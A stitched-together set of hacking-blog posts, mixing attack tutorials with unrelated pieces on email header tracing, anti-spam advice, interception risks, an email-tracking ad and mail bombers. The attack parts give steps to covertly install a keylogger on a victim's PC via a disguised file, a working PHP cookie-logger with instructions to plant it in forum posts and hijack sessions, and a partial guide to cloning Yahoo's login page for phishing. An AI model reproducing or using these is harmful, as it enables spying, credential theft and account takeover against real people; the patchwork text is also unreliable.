In my previous article “How To Write A Basic Keylogger In VB” I showed you how to write your own keylogger. Today I will show you how to install a Keylogger on a Remote PC without the knowledge of the owner and you will get all the keystroke information through Email.

Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article.

Now to install a Keylogger on a Remote Computer you have to follow the steps given below:

1. First of all download Winspy keylogger software from link given below:
   

   http://www.win-spy.com/

2. After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
5. Now, Winspy’s main screen will be displayed as shown in image below:
6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
   

   User – type in the victim’s name
   File name – Name the file to be sent. Use the name such that victim will love to accept it.
   File icon – Keep it the same
   Picture – select the picture you want to apply to the keylogger.
   Email keylog to – Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
   Thats it. This much is enough. If you want, can change other settings also.

8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.

So guys, I hope you have got the trick on how to hack any email account passwords from this article. If you have any comment or views about article, feel free to mention it in comments section.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options. In Gmail to view the headers there is a option show original in the menu at the top-right corner of the message.

Below are listed the headers of an actual spam message I received. I’ve changed my email address and the name of my server for obvious reasons. I’ve also double spaced the headers to make them more readable.

Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: “Maricela Paulson” <s359dyxtt@yahoo.com>

Reply-To: “Maricela Paulson” <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels…isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary=”MIMEStream=_0+211404_90873633350646_4032088448″

According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn’t come from yahoo’s email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.

Here’s is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 – 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 – 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN’s WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom’s web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host’s IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header.

A good spam filter will help categorize which emails you want to receive and those which you do not. If you are a business professional, one would assume that as long as you are not sending out mass emails to unsuspecting people there is little reason to worry that your emails won’t be delivered in a timely and reliable fashion. The truth is that email is something that must be managed and meticulously planned, especially for businesses that rely on the internet and email for a large portion of their sales and marketing. Putting yourself in the shoes of the email provider and relying on common sense is simply not enough if want to stay off blacklist and separate yourself from the Canadian pharmacy and obscure stock picks.

1. If you send out promotional newsletters only send them to customers that opt-in for your service. Equally important is to provide the customer the option to opt-out; this should be included in the footer of every newsletter that is sent.
2. Your address needs to look legitimate. If your customer can’t tell who the email is from by looking at the address they might hesitate and flag you as spam.
3. Make sure that your subject line is accurate and trustworthy. If the subject does not get your customers attention and alert them to who you are, you are a spammer to them. Try to distinguish yourself from common junk mail.
4. Follow the same general rules for the content of the email that I have suggested for the subject line. Obviously the content is very important and if you are saying something that is untrue or unrelated to what the customers expects, they are likely to opt out or report you as spam.
5. Try to address every returned or delayed email to let the recipient address know that you are indeed legitimate. Most will have a form to fill out where you will have a chance to explain what it is you do and why you should not be treated as spam.

With all that being said, unfortunately there is no simple path to follow that can guarantee you won’t end up on a blacklist. I know this from running my Debt Settlement Company, www.selectdebtrelief.com An effective email strategy is inevitably more complex if you happen to be in an industry that has traditionally abused email. If the words debt, mortgage, credit, or Viagra are related to a product or service you offer, expect to spend a lot of time convincing people that you not one of the “bad apples” that has ruined it for the group.

i. The Internet

The Internet has radically changed the way we communicate with each other. Email is obviously an extremely valuable and ubiquitous form of communication, but with this technology comes certain pitfalls that should be understood. The path that an email message takes to reach its recipient is a complex and varying one, and while in transit that message may come under the potential scrutiny of numerous different people and organizations.

We will attempt to outline the varying paths that an email message may travel, and who some of those different people and organizations might be under whose scrutiny the message may pass. The intention of the document is not to provide a how-to guide; the only specific technique that will be discussed, packet sniffing, is one that anybody with any technical networking knowledge whatsoever is already familiar with – which brings us to an important point. At a round number, there are probably at least a million people in the world with the requisite technical knowledge necessary to intercept Internet-based email. Yes, I said a million. (There are actually probably a lot more than that – maybe several million by now, and more everyday as the populace becomes more networking-literate.) Fortunately, the number of those people who actually have the physical access necessary to intercept email is much smaller, but it is still a very large number.

ii. Internet Service Provider (ISP)

The Internet is composed of numerous different interconnected networks and systems that collectively provide a backbone for the transmission of network traffic. It is a highly dynamic physical environment: a system or network device that is here today may be gone or reconfigured tomorrow, and the underlying protocols of the Internet will automatically detect and accommodate for this change. This dynamic nature is one of the things that make the Internet so powerful. However, given the dynamic nature of the Internet, it is impossible to absolutely predict exactly what path network traffic will follow. One email message that you send could take an entirely different path to reach the recipient than another that you send to the same person. In fact, it is even worse than that: for the sake of efficiency, email messages and other network traffic are typically broken down into smaller little chunks, or packets, before they are sent across the
network, and automatically re-assembled on the other side. Each of these individual packets may in fact follow a different path to get to the recipient! (In actual practice, a given path tends to get reused until the operational parameters of that or other related paths have significantly changed.)

The net result of all this is that your message, or at least little chunks of your message, travels through an indeterminate set of systems and network devices, each of which offers a point of interception. These systems may be owned or operated by corporations and non-profit organizations, by colleges, by governments and government agencies, or by telecom and other connectivity providers. Given such a widely divergent group, it is easy to see how either an unethical organization or a renegade employee may easily gain access to the messages and traffic crossing their systems. All of these factors combine to make the Internet itself the primary source of message interception points.

What is MailTracking?

MailTracking is the most powerful and reliable email tracking service that exists today. In short – MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more

How do I send a tracked email? There are two ways you can send tracked emails:

1. Simply add: .mailtracking.com to the end of your recipients email address (they won’t see this)
   or
2. Install the ActiveTracker plugin to add the tracking for you.

Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don’t usually write to themselves) – so we recommend you test by sending to other people.

What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:

• Date and time opened
• Location of recipient (per their ISP city /town)
• Map of location (available on paid subscriptions)
• Recipients IP address
• Apparent email address of opening (if available)
• Referrer details (ie; if accessed via web mail etc)
• URL clicks
• How long the email was read for
• How many times your email was opened
• If your email was forwarded, or opened on a different computer

All messages sent via MailTracking benefit from the SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: MailTracking.com does not use or contain any sp‌y-ware, ma‌l-ware, nor vi‌rues, it is not ill‌egal to use, and does not breach any pri‌vacy reg‌ulations in any countries.

What else does MailTracking do?

There are lots of great features available to you – these include the following sending options:

• Certified email
• Ensured-Receipts and retractable emails
• Invisible tracking
• Self-Destructing emails
• Block printing
• Block forwarding
• Adobe Acrobat PDF Document Tracking
• Secure Encypted emails
• Track MS Word or Excel documents

You can also choose how to receive your receipts:

• In your Personal Tracking Page (when you log in)
• Email ReadNotifications
• Legal Proof-of-Opening receipts
• Delivery Service Notifications (DSN’s)
• SMS alert on your cell-phone or pager
• Instant Messenger

Click Here to Register.

Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient’s inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?

Now follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
   
   put the following code after placing your form id:

Mail bombers sometimes are used as mass mailing software and in that case are legal programs used for business improvement. Individual users also are able to use these programs.

Most popular programs are:

Avalanch 3.6, Aenima 2.0, Bomsquad, Extreme Mail, Hacktec, KaBoom 3.0, Unabomber, Homicide, Digital Destruction Beta, Euthanasia, Ghost Mail 5.1, Saddamme 0.2, X-Mail, etc. Most of them are free.

Business corporations use mass mailing software for newsletters. They provide new information about their new products, new services, updates and other things to legally registered members of theirs site who agreed to get notifications. It’s very convenient to use mass mailing software in that case. Individual users use mail bomber for mass mailing messages. If one had received a good joke, it’s more convenient to send it to a group of friend. It is useful and fun tool.

But in the hands of porno site’s manager it can become a tool for Spam. If your e-mail address is known or obtained without your knowledge you might be flooded with Spam. You can get over thousand letters per day. They can be infected, or advertisement for porno sites, remedy, etc. Links that are included in e-mail may lead you to site’s that are bundled with hijackers or some other spyware. It might be great threat to you privacy.

Using good Anti-Spyware or Anti-Spam program should help you to prevent Spam and mail bombers flood.